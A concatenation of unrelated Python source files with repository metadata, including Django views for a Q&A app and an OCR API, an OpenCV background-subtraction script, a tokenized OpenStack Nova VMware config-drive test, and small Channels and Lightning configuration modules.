| 2021-07-24T14:25:56.982106 | 2013-07-08T11:10:41 | 2013-07-08T11:10:41 | 5,333,141 | 0 | 0 | null | 2021-06-10T17:45:33 | 2012-08-07T20:29:46 |
Python
|
UTF-8
|
Python
| false | false | 3,808 |
py
|
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from django.contrib.auth.decorators import login_required
from django.contrib import auth
from skill.models import Skill
from carac.models import Carac
from item.models import Item
from carac.forms import CaracFormChoice
from skill.forms import SkillForm
from item.forms import ItemForm
from jack.forms import JackRegisterForm
from django.forms.formsets import formset_factory
from django.forms.formsets import BaseFormSet
from hand.forms import AskForm
from hand.models import Question,Answer
from jack.models import CaracUser,SkillUser,ItemUser
from tag.models import Tag
from engine.models import ThreadEngine
from engine.script import sendnotification
#TODO
# A factyoriser enregistrement skills carac items
def enregistrementAnswer(request):
user = User.objects.get(id=request.user.id)
reponse = request.POST['Reponse']
tags = request.POST['Tags']
threadengineid = int(request.POST['ThreadEngineId'])
threadengine = ThreadEngine.objects.get(id=threadengineid)
questionid = int(request.POST['QuestionId'])
tags = tags.split("#")
question = Question.objects.get(id=questionid)
answer = Answer.objects.create(user=user,Text=reponse)
answer.Question.add(question)
#TODO
# a factoriser
for tag in tags :
tag = tag.strip()
try :
result = Tag.objects.get(Name=tag)
except :
result = Tag.objects.create(Name=tag)
result.save()
answer.Tags.add(result)
answer.save()
threadengine.Answer.add(answer)
threadengine.save()
def enregistrementAsk(request,caracs,skills,items,intitule,description,tags) :
question = Question.objects.create()
question.save()
question.user = User.objects.get(id=request.user.id)
question.Text = description
question.Intitule = intitule
question.save()
#TODO
#Factoriser et expliquer les tags
tags = tags.split('#')
# TODO
# A factoriser
for tag in tags :
tag = tag.strip()
try :
result = Tag.objects.get(Name=tag)
except :
result = Tag.objects.create(Name=tag)
result.save()
question.Tags.add(result)
question.save()
for carac in caracs.keys():
caracdb = Carac.objects.get(Nom=carac)
try :
result = CaracUser.objects.get(carac=caracdb,Level=int(caracs[carac][0]))
except :
result = CaracUser.objects.create(Level=0)
result.Carac.add(caracdb)
result.Level = int(caracs[carac][0])
result.save()
question.Caracs.add(result)
for skill in skills.keys():
skilldb = Skill.objects.get(Nom=skill)
print "nomSki"
print skilldb.Nom
private = False
try :
result = SkillUser.objects.get(Skills=skilldb,Level=int(skills[skill][0]))
except :
result = SkillUser.objects.create(Level=0)
result.Skill.add(skilldb)
result.Private = private
result.Level = int(skills[skill][0])
result.save()
question.Skills.add(result)
for item in items.keys():
itemdb = Item.objects.get(Nom=item)
try :
result = ItemUser.objects.get(Item=itemdb)
except :
result = ItemUser.objects.create()
result.Item.add(itemdb)
result.Private = private
result.save()
question.Items.add(result)
question.save()
threadengine = ThreadEngine.objects.create()
threadengine.Question.add(question)
threadengine.save()
sendnotification(question,threadengine)
|
[
"bussiere@gmail.com"
] |
bussiere@gmail.com
|
b9f331103a0bf956b0ad3d59e3c5760c3f9345fb
|
944809cdb595c2338518977317253f5cfa89756e
|
/scripts/background_subtraction.py
|
b552e7e8b692a4524d7f35a4a924144c3ca5f158
|
[] |
no_license
|
adithyamurali/DeepMilestones
|
874965d7040d4ef54f6a6692274bd7ce8c791178
|
c031f55595dbfc01d493bce0ccab548bdecb6001
|
refs/heads/master
| 2021-01-22T14:01:56.932705 | 2015-10-02T01:16:35 | 2015-10-02T01:16:35 | 39,215,948 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,070 |
py
|
import numpy as np
import cv2
import argparse
import sys
import matplotlib.pyplot as plt
import IPython
import parser
import utils
import constants
def run_video_with_bsub(cap, func, kernel = None, params = None):
if params is not None:
fgbg = func(params[0], params[1], params[2], params[3])
else:
fgbg = func()
SAVE_PATH = constants.PATH_TO_DATA + constants.NEW_BGSUB_FOLDER + "Suturing_E003_capture2/"
i = 1
while(1):
ret, frame = cap.read()
print i
fgmask = fgbg.apply(frame)
mask_rbg = cv2.cvtColor(fgmask, cv2.COLOR_GRAY2BGR)
draw = frame & mask_rbg
if frame == None and mask_rbg == None:
sys.exit()
if kernel is not None:
fgmask = cv2.morphologyEx(fgmask, cv2.MORPH_OPEN, kernel)
# cv2.namedWindow("frame", cv2.WND_PROP_FULLSCREEN)
# cv2.setWindowProperty("frame", cv2.WND_PROP_FULLSCREEN, cv2.cv.CV_WINDOW_FULLSCREEN)
cv2.imshow('frame', draw)
cv2.imwrite(SAVE_PATH + utils.get_frame_fig_name(i), draw)
k = cv2.waitKey(30) & 0xff
i += 1
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("video", help = "A: Suturing: B: Pizza making")
parser.add_argument("type", help = "1: MOG 2: MOG2 3: Ken's algorithm")
args = parser.parse_args()
cap = None
if args.video == 'A':
cap = cv2.VideoCapture('/home/animesh/DeepMilestones/jigsaws/Suturing_video/frames/Suturing_E003_capture2/cropped_scaled.avi')
elif args.video == 'B':
cap = cv2.VideoCapture('/home/animesh/C3D/examples/c3d_feature_extraction/input/frm/pizza8/videos/cropped_scaled.avi')
else:
print "Invalid video type"
sys.exit()
if (int(args.type) == 1):
params = (500, 10, 0.9, 1)
run_video_with_bsub(cap, cv2.BackgroundSubtractorMOG, params = None)
elif (int(args.type) == 2):
run_video_with_bsub(cap, cv2.BackgroundSubtractorMOG2)
elif (int(args.type) == 3):
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3,3))
run_video_with_bsub(cap, cv2.createBackgroundSubtractorGMG, kernel = kernel)
else:
print "Error Type"
sys.exit()
|
[
"adithya_murali@berkeley.edu"
] |
adithya_murali@berkeley.edu
|
6a069aad4eae164b7a135b62b70c4a3ad36591d9
|
75d8667735782cd1d0eb4877e52c89da5cd92dde
|
/nova/tests/unit/virt/vmwareapi/test_configdrive.py
|
9462d39ae2ad4d8c8a8ebadc31116bba226df242
|
[
"Apache-2.0"
] |
permissive
|
bopopescu/nova-token
|
ffecfd3ec561936b7d9d7e691bc57383cde05436
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
refs/heads/master
| 2022-11-22T09:53:31.073483 | 2016-05-14T02:47:01 | 2016-05-15T22:02:55 | 282,105,621 | 0 | 0 |
Apache-2.0
| 2020-07-24T02:42:19 | 2020-07-24T02:42:18 | null |
UTF-8
|
Python
| false | false | 14,534 |
py
|
begin_unit
comment|'# Copyright 2013 IBM Corp.'
nl|'\n'
comment|'# Copyright 2011 OpenStack Foundation'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'fixtures'
newline|'\n'
name|'import'
name|'mock'
newline|'\n'
name|'from'
name|'mox3'
name|'import'
name|'mox'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'context'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'image'
name|'import'
name|'glance'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'objects'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
name|'import'
name|'fake_instance'
newline|'\n'
name|'import'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'image'
op|'.'
name|'fake'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
name|'import'
name|'utils'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'fake'
name|'as'
name|'vmwareapi_fake'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'stubs'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
name|'import'
name|'uuidsentinel'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
name|'import'
name|'fake'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'driver'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'vm_util'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'vmops'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|ConfigDriveTestCase
name|'class'
name|'ConfigDriveTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
nl|'\n'
DECL|variable|REQUIRES_LOCKING
indent|' '
name|'REQUIRES_LOCKING'
op|'='
name|'True'
newline|'\n'
nl|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'driver'
op|'.'
name|'VMwareVCDriver'
op|','
string|"'_register_openstack_extension'"
op|')'
newline|'\n'
DECL|member|setUp
name|'def'
name|'setUp'
op|'('
name|'self'
op|','
name|'mock_register'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'ConfigDriveTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'vm_util'
op|'.'
name|'vm_refs_cache_reset'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'context'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
string|"'fake'"
op|','
string|"'fake'"
op|','
name|'is_admin'
op|'='
name|'False'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'cluster_name'
op|'='
string|"'test_cluster'"
op|','
nl|'\n'
name|'host_ip'
op|'='
string|"'test_url'"
op|','
nl|'\n'
name|'host_username'
op|'='
string|"'test_username'"
op|','
nl|'\n'
name|'host_password'
op|'='
string|"'test_pass'"
op|','
nl|'\n'
name|'use_linked_clone'
op|'='
name|'False'
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'enabled'
op|'='
name|'False'
op|','
name|'group'
op|'='
string|"'vnc'"
op|')'
newline|'\n'
name|'vmwareapi_fake'
op|'.'
name|'reset'
op|'('
op|')'
newline|'\n'
name|'stubs'
op|'.'
name|'set_stubs'
op|'('
name|'self'
op|')'
newline|'\n'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'image'
op|'.'
name|'fake'
op|'.'
name|'stub_out_image_service'
op|'('
name|'self'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'conn'
op|'='
name|'driver'
op|'.'
name|'VMwareVCDriver'
op|'('
name|'fake'
op|'.'
name|'FakeVirtAPI'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'network_info'
op|'='
name|'utils'
op|'.'
name|'get_test_network_info'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'node_name'
op|'='
name|'self'
op|'.'
name|'conn'
op|'.'
name|'_nodename'
newline|'\n'
name|'image_ref'
op|'='
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'image'
op|'.'
name|'fake'
op|'.'
name|'get_valid_image_id'
op|'('
op|')'
newline|'\n'
name|'instance_values'
op|'='
op|'{'
nl|'\n'
string|"'vm_state'"
op|':'
string|"'building'"
op|','
nl|'\n'
string|"'project_id'"
op|':'
string|"'fake'"
op|','
nl|'\n'
string|"'user_id'"
op|':'
string|"'fake'"
op|','
nl|'\n'
string|"'name'"
op|':'
string|"'1'"
op|','
nl|'\n'
string|"'kernel_id'"
op|':'
string|"'1'"
op|','
nl|'\n'
string|"'ramdisk_id'"
op|':'
string|"'1'"
op|','
nl|'\n'
string|"'mac_addresses'"
op|':'
op|'['
op|'{'
string|"'address'"
op|':'
string|"'de:ad:be:ef:be:ef'"
op|'}'
op|']'
op|','
nl|'\n'
string|"'memory_mb'"
op|':'
number|'8192'
op|','
nl|'\n'
string|"'flavor'"
op|':'
name|'objects'
op|'.'
name|'Flavor'
op|'('
name|'vcpus'
op|'='
number|'4'
op|','
name|'extra_specs'
op|'='
op|'{'
op|'}'
op|')'
op|','
nl|'\n'
string|"'instance_type_id'"
op|':'
number|'0'
op|','
nl|'\n'
string|"'vcpus'"
op|':'
number|'4'
op|','
nl|'\n'
string|"'root_gb'"
op|':'
number|'80'
op|','
nl|'\n'
string|"'image_ref'"
op|':'
name|'image_ref'
op|','
nl|'\n'
string|"'host'"
op|':'
string|"'fake_host'"
op|','
nl|'\n'
string|"'task_state'"
op|':'
string|"'scheduling'"
op|','
nl|'\n'
string|"'reservation_id'"
op|':'
string|"'r-3t8muvr0'"
op|','
nl|'\n'
string|"'id'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'uuid'"
op|':'
name|'uuidsentinel'
op|'.'
name|'foo'
op|','
nl|'\n'
string|"'node'"
op|':'
name|'self'
op|'.'
name|'node_name'
op|','
nl|'\n'
string|"'metadata'"
op|':'
op|'['
op|']'
op|','
nl|'\n'
string|"'expected_attrs'"
op|':'
op|'['
string|"'system_metadata'"
op|']'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'test_instance'
op|'='
name|'fake_instance'
op|'.'
name|'fake_instance_obj'
op|'('
name|'self'
op|'.'
name|'context'
op|','
nl|'\n'
op|'**'
name|'instance_values'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'test_instance'
op|'.'
name|'flavor'
op|'='
name|'objects'
op|'.'
name|'Flavor'
op|'('
name|'vcpus'
op|'='
number|'4'
op|','
name|'memory_mb'
op|'='
number|'8192'
op|','
nl|'\n'
name|'ephemeral_gb'
op|'='
number|'0'
op|','
name|'swap'
op|'='
number|'0'
op|','
nl|'\n'
name|'extra_specs'
op|'='
op|'{'
op|'}'
op|')'
newline|'\n'
nl|'\n'
op|'('
name|'image_service'
op|','
name|'image_id'
op|')'
op|'='
name|'glance'
op|'.'
name|'get_remote_image_service'
op|'('
name|'context'
op|','
nl|'\n'
name|'image_ref'
op|')'
newline|'\n'
name|'metadata'
op|'='
name|'image_service'
op|'.'
name|'show'
op|'('
name|'context'
op|','
name|'image_id'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'image'
op|'='
name|'objects'
op|'.'
name|'ImageMeta'
op|'.'
name|'from_dict'
op|'('
op|'{'
nl|'\n'
string|"'id'"
op|':'
name|'image_ref'
op|','
nl|'\n'
string|"'disk_format'"
op|':'
string|"'vmdk'"
op|','
nl|'\n'
string|"'size'"
op|':'
name|'int'
op|'('
name|'metadata'
op|'['
string|"'size'"
op|']'
op|')'
op|','
nl|'\n'
op|'}'
op|')'
newline|'\n'
nl|'\n'
DECL|class|FakeInstanceMetadata
name|'class'
name|'FakeInstanceMetadata'
op|'('
name|'object'
op|')'
op|':'
newline|'\n'
DECL|member|__init__
indent|' '
name|'def'
name|'__init__'
op|'('
name|'self'
op|','
name|'instance'
op|','
name|'content'
op|'='
name|'None'
op|','
name|'extra_md'
op|'='
name|'None'
op|','
nl|'\n'
name|'network_info'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'pass'
newline|'\n'
nl|'\n'
DECL|member|metadata_for_config_drive
dedent|''
name|'def'
name|'metadata_for_config_drive'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
op|'['
op|']'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'self'
op|'.'
name|'useFixture'
op|'('
name|'fixtures'
op|'.'
name|'MonkeyPatch'
op|'('
nl|'\n'
string|"'nova.api.metadata.base.InstanceMetadata'"
op|','
nl|'\n'
name|'FakeInstanceMetadata'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_make_drive
name|'def'
name|'fake_make_drive'
op|'('
name|'_self'
op|','
name|'_path'
op|')'
op|':'
newline|'\n'
indent|' '
name|'pass'
newline|'\n'
comment|"# We can't actually make a config drive v2 because ensure_tree has"
nl|'\n'
comment|'# been faked out'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.virt.configdrive.ConfigDriveBuilder.make_drive'"
op|','
nl|'\n'
name|'fake_make_drive'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_upload_iso_to_datastore
name|'def'
name|'fake_upload_iso_to_datastore'
op|'('
name|'iso_path'
op|','
name|'instance'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'pass'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.virt.vmwareapi.images.upload_iso_to_datastore'"
op|','
nl|'\n'
name|'fake_upload_iso_to_datastore'
op|')'
newline|'\n'
nl|'\n'
DECL|member|tearDown
dedent|''
name|'def'
name|'tearDown'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'ConfigDriveTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'tearDown'
op|'('
op|')'
newline|'\n'
name|'vmwareapi_fake'
op|'.'
name|'cleanup'
op|'('
op|')'
newline|'\n'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'image'
op|'.'
name|'fake'
op|'.'
name|'FakeImageService_reset'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vmops'
op|'.'
name|'VMwareVMOps'
op|','
string|"'_get_instance_metadata'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake_metadata'"
op|')'
newline|'\n'
DECL|member|_spawn_vm
name|'def'
name|'_spawn_vm'
op|'('
name|'self'
op|','
name|'fake_get_instance_meta'
op|','
nl|'\n'
name|'injected_files'
op|'='
name|'None'
op|','
name|'admin_password'
op|'='
name|'None'
op|','
nl|'\n'
name|'block_device_info'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
nl|'\n'
indent|' '
name|'injected_files'
op|'='
name|'injected_files'
name|'or'
op|'['
op|']'
newline|'\n'
name|'self'
op|'.'
name|'conn'
op|'.'
name|'spawn'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'test_instance'
op|','
name|'self'
op|'.'
name|'image'
op|','
nl|'\n'
name|'injected_files'
op|'='
name|'injected_files'
op|','
nl|'\n'
name|'admin_password'
op|'='
name|'admin_password'
op|','
nl|'\n'
name|'network_info'
op|'='
name|'self'
op|'.'
name|'network_info'
op|','
nl|'\n'
name|'block_device_info'
op|'='
name|'block_device_info'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_vm_with_config_drive_verify_method_invocation
dedent|''
name|'def'
name|'test_create_vm_with_config_drive_verify_method_invocation'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'test_instance'
op|'.'
name|'config_drive'
op|'='
string|"'True'"
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'vmops'
op|'.'
name|'VMwareVMOps'
op|','
string|"'_create_config_drive'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'vmops'
op|'.'
name|'VMwareVMOps'
op|','
string|"'_attach_cdrom_to_vm'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'conn'
op|'.'
name|'_vmops'
op|'.'
name|'_create_config_drive'
op|'('
name|'self'
op|'.'
name|'test_instance'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
nl|'\n'
op|')'
op|'.'
name|'AndReturn'
op|'('
string|"'[ds1] fake.iso'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'conn'
op|'.'
name|'_vmops'
op|'.'
name|'_attach_cdrom_to_vm'
op|'('
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
comment|'# if spawn does not call the _create_config_drive or'
nl|'\n'
comment|'# _attach_cdrom_to_vm call with the correct set of parameters'
nl|'\n'
comment|"# then mox's VerifyAll will throw a Expected methods never called"
nl|'\n'
comment|'# Exception'
nl|'\n'
name|'self'
op|'.'
name|'_spawn_vm'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_vm_without_config_drive
dedent|''
name|'def'
name|'test_create_vm_without_config_drive'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'test_instance'
op|'.'
name|'config_drive'
op|'='
name|'None'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'vmops'
op|'.'
name|'VMwareVMOps'
op|','
string|"'_create_config_drive'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'vmops'
op|'.'
name|'VMwareVMOps'
op|','
string|"'_attach_cdrom_to_vm'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
comment|'# if spawn ends up calling _create_config_drive or'
nl|'\n'
comment|'# _attach_cdrom_to_vm then mox will log a Unexpected method call'
nl|'\n'
comment|'# exception'
nl|'\n'
name|'self'
op|'.'
name|'_spawn_vm'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_vm_with_config_drive
dedent|''
name|'def'
name|'test_create_vm_with_config_drive'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'test_instance'
op|'.'
name|'config_drive'
op|'='
string|"'True'"
newline|'\n'
name|'self'
op|'.'
name|'_spawn_vm'
op|'('
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
|
[
"dmg@uvic.ca"
] |
dmg@uvic.ca
|
a87f1b16a0c24b911ed48b462eb0144df949a491
|
92796ecf76e64796b4d265df281bf27b4206f1b8
|
/wechat/wechat/asgi.py
|
d603532362615412bd68c8353200c60bcc0a8d45
|
[] |
no_license
|
singhsagar27/Wechat---Real-Time-Chat-App
|
e4ee1d81f2c0d9cd83154609fcf2506c7f2b0655
|
6e74354daa76b2527ed070a84a36434e5e264069
|
refs/heads/main
| 2023-03-20T19:02:13.763649 | 2021-03-19T14:33:32 | 2021-03-19T14:33:32 | 348,711,365 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 549 |
py
|
import os
from django.core.asgi import get_asgi_application
from channels.routing import ProtocolTypeRouter, URLRouter
from channels.auth import AuthMiddlewareStack
import chat.routing
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'wechat.settings')
application = get_asgi_application()
application = ProtocolTypeRouter({
"http": get_asgi_application(),
"websocket": AuthMiddlewareStack(
URLRouter(
chat.routing.websocket_urlpatterns
)
),
# Just HTTP for now. (We can add other protocols later.)
})
|
[
"47419028+theambrosial@users.noreply.github.com"
] |
47419028+theambrosial@users.noreply.github.com
|
83b81627d484d881a90f8b4ff4ac32c922a54f53
|
6ebffea0be90da76503a95b029d4a6a07204229e
|
/data/datamodule.py
|
d2d7aa6a8a5dbb72df301df3d32e7e0c46f6988f
|
[] |
no_license
|
Huizerd/bnns
|
7853a647ba1b592f42c8c9fd0fbe31108d41fd12
|
9e13cfdf25d3050ab23692dbca47446c8b9dbd90
|
refs/heads/master
| 2023-06-24T12:33:52.086644 | 2021-06-25T11:44:05 | 2021-06-25T11:44:05 | 371,048,303 | 1 | 0 | null | 2021-06-21T11:20:52 | 2021-05-26T13:42:32 |
VHDL
|
UTF-8
|
Python
| false | false | 267 |
py
|
from pl_bolts.datasets.mnist_dataset import BinaryMNIST
from pl_bolts.datamodules.mnist_datamodule import MNISTDataModule
class BinaryMNISTDataModule(MNISTDataModule):
name = "binarymnist"
dataset_cls = BinaryMNIST # has 0.5 as threshold for making binary
|
[
"15855769+Huizerd@users.noreply.github.com"
] |
15855769+Huizerd@users.noreply.github.com
|
68a6ad72b6ba110b69031ee89e2ee46750bbdae1
|
74be41563cba82ec784aed3c893a53261a428ab1
|
/myapp/ocr_api/views.py
|
db6910d7ae1c32dea6bf6323e19f1305a4a8f71f
|
[] |
no_license
|
Bakushin10/Django
|
e06ad485084d917886a50e5f3c38f8b049c85fb1
|
184db43f58e4679c2a556f9603f5e3bec61da1eb
|
refs/heads/master
| 2022-12-12T13:34:24.391273 | 2019-11-05T14:33:29 | 2019-11-05T14:33:29 | 202,837,195 | 0 | 0 | null | 2022-12-08T06:53:31 | 2019-08-17T04:55:27 |
Python
|
UTF-8
|
Python
| false | false | 5,626 |
py
|
import os, sys, json
from PIL import Image, ImageDraw2
from django.shortcuts import render
from django.shortcuts import render, HttpResponseRedirect
from django.http import HttpResponse, JsonResponse
from ocr_api.models import OCRInputModel, JsonOCRInputModel
from ocr_api.serializers import OCRInputModelSerializer, JsonOCRInputModelSerializer
from django.views.decorators.csrf import csrf_exempt
@csrf_exempt
def post_dummy_data(request):
"""
basic API call for a POST method
it will post dummy data
based on the OCRInputModel defined ocr_api.models
"""
if request.method == "POST":
data = {"ocrJson" : "Two"}
serializer = OCRInputModelSerializer(data = data)
if serializer.is_valid(raise_exception = True):
data_saved = serializer.save()
return HttpResponse("success: {} was created".format(data))
@csrf_exempt
def post_ocr_results(request):
"""
**** Please dont call this API if data is alrady stored at endpoint ****
demo API POST call for OCR result.
read a Json from a local file and post it to endpoint.
"""
if request.method == "POST":
response = readJson()
print("{} {} {}".format("*"*10, "tatal amount of data : ", len(response["response"])))
print("{} {}".format("*"*10, request))
for json_data in response["response"]:
# print(json_data)
x , y = [], []
for coordinate in json_data["coordinates"]:
x.append(coordinate["y"])
y.append(coordinate["x"])
data = {
"field" : str(json_data["field"]),
"hasField" : json_data["hasField"],
"coordinates" : str(json_data["coordinates"]),
"x_coordinates" : str(x),
"y_coordinates" : str(y),
"text" : json_data["text"]
}
serializer = JsonOCRInputModelSerializer(data = data)
if serializer.is_valid(raise_exception = True):
data_saved = serializer.save()
return HttpResponse("{} {} {}".format("All ", len(response["response"]), " data posted!"))
@csrf_exempt
def get_ocr_results(request):
"""
retrieve fake OCR data from an endpoint
"""
data = JsonOCRInputModel.objects.all()
if request.method == "GET":
serializer = JsonOCRInputModelSerializer(data, many = True)
dataToDisplay = getDataToDisplay(serializer.data)
return JsonResponse(dataToDisplay, safe = False)
@csrf_exempt
def get_ocr_results_by_id(request, username):
"""
retrieve fake OCR data by id
"""
if request.method != "GET":
return HttpResponse("GET request only")
data = JsonOCRInputModel.objects.filter(field=username)
if len(data) == 0:
return HttpResponse("no data found")
return HttpResponse(data.values())
@csrf_exempt
def get_ocred_image(request):
"""
retrieve fake OCR data from an endpoint
"""
data = JsonOCRInputModel.objects.all()
SUCCESS_MESSAGE = {"image successfully ocred": "OK"}
ERROR_MESSAGE = {"image could not be ocred": "ERROR"}
if request.method == "GET":
serializer = JsonOCRInputModelSerializer(data, many = True)
imagePath = "ocr_api/img/"
imageName = "sample.jpg"
try:
drawLinesOnImages(imagePath, imageName, serializer.data)
except:
return JsonResponse(ERROR_MESSAGE, safe = False)
return JsonResponse(SUCCESS_MESSAGE, safe = False)
@csrf_exempt
def get_dummy_data(request):
"""
basic API call for a GET method
"""
data = OCRInputModel.objects.all()
if request.method == "GET":
serializer = OCRInputModelSerializer(data, many=True)
dataToDisplay = getDataToDisplay(serializer.data)
return JsonResponse(dataToDisplay, safe=False)
def readJson():
"""
read JSON data from local file
"""
#path = "ocr_api/json/test.json"
path = "ocr_api/json/ocrReturnValues.json"
#return ""
with open(os.path.join(sys.path[0], path)) as f:
data = json.load(f)
print("{} {}".format("*"*10, data["response"]))
return data
def getDataToDisplay(data):
"""
add "total amount amount of data" for readability purposes
"""
return ["total amount data : " + str(len(data))] + data
def drawLinesOnImages(imagePath, imageName, data):
detectTextOnImage(imagePath, imageName, data)
# detectTextBoxOnImage(imagePath)
def detectTextOnImage(imagePath,imageName, data):
"""
draw line to the image based on the x and y coordinates from JSON
"""
im = Image.open(imagePath + imageName)
d = ImageDraw2.Draw(im)
pen = ImageDraw2.Pen(color="red")
for j in data:
x = j["x_coordinates"].replace("[","").replace("]","").split(",")
